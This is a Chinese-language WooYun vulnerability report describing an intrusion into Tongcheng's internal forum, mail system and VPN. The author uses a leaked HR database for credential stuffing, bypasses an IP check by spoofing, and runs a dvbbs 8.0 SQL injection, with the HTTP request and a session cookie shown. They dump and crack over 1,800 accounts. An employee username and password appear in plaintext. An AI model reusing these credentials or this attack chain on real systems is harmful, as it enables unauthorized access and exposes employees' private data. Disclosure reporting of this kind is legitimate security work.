WooYun.org

新年了，没事再看我以前提交的漏洞 WooYun: 利用某些漏洞可以重置同程网任意用户密码 ，看到了自己第一个闪电的漏洞厂商同程网，于是继续来检测下她的安全。
把外部网站大概看了一下，没有什么漏洞，咱是穷人，不像人民币玩家找洞那么轻松。搞了半天，没有头绪，忽然在我的QQ邮箱里面翻到了以前发给同程技术的一个数据库，这个库是他们内网的hr库。
有了这个库，脑洞大开，想到了一个思路：撞库-getshell or注入-继续撞库
来说明下：因为手上的老库都是内部信息，所以唯一能撞库的只有他们的内部论坛inbbs.17u.com
假如成功就可以尝试上次的方法getshell，如果不能getshell，尝试注入，因为dvbbs8.0 asp存在一个注入，2007年出的，回想当年，是asp的天下。如果能注入，继续撞库，看能否进入公司邮箱，进入邮箱也就代表了可以拨入vpn进入内网。
来到他们的内部论坛

先尝试正常注册，提示只有内网用户 才能注册

asp代码检测来源ip可以用伪造ip来bypass

如图，轻松bypass。可是他么的发现还要审核！！
没办法，只能撞库了。由于时间好久，忘记了论坛用户名的规则，那怎么样才能知道用户名的规则了?这个时候只能靠rss这个神奇的东西了

发现用户名是姓名加工号，于是开始撞库，折腾了三小时搞出了一个账号
江伟伟0328 jww0924!@#
进入论坛发现以前getshell的漏洞已经被补了，只能靠注入了
dvbbs 8.0 注入 exp 参数topicid

POST /inbbs/Appraise.asp?action=save HTTP/1.1
Origin: http://inbbs.17u.com:8080
Content-Length: 740
Accept-Language: zh-CN,zh;q=0.8
Accept-Encoding: gzip,deflate
Host: inbbs.17u.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Connection: close
Referer: http://inbbs.17u.com:8080/inbbs/dispbbs.asp?BoardID=1179&ID=33455&replyID=&skin=1
Cache-Control: max-age=0
Cookie: DvForum=UserID=28&usercookies=0&userclass=%B9%DC%C0%ED%D4%B1&username=%F6%C4%EF%C7&password=3O263U7hgb314ixb&userhidden=2&StatUserID=22126511262; 
boardid=1179&topicid=sqlinj here&announceid=3585149&atype=0&a1=0&a2=0&atitle=sa&acodestr=8342&acontent=asd

成功注入后获取了管理员账号，进入后台

发现fso组件已经被kill了，无法shell，没办法，只能狠一点，把所有的用户账号拖了出来。
然后便开始数据整理，1800多条数据，要整理成固定格式，还要把cmd5批量破解出来的密码附加上，此处省略一万字。。。
整完之后便开始对邮件系统mail.17u.com开始撞库
费了那么大力气，老天还是眷恋了我一把，长度为477的结果就是正确的账号密码

最后成功获取了十几个邮箱账号
随便登陆一个试试

模糊的记得同程使用的是pptvpn 。可是ip地址忘了，怎么办?
找了半天没找到，后来发现不是有内部论坛嘛，去翻了一下，果然看到了

就不深入了，晚上整理数据搞了几小时，浑身冻僵，实在没力气了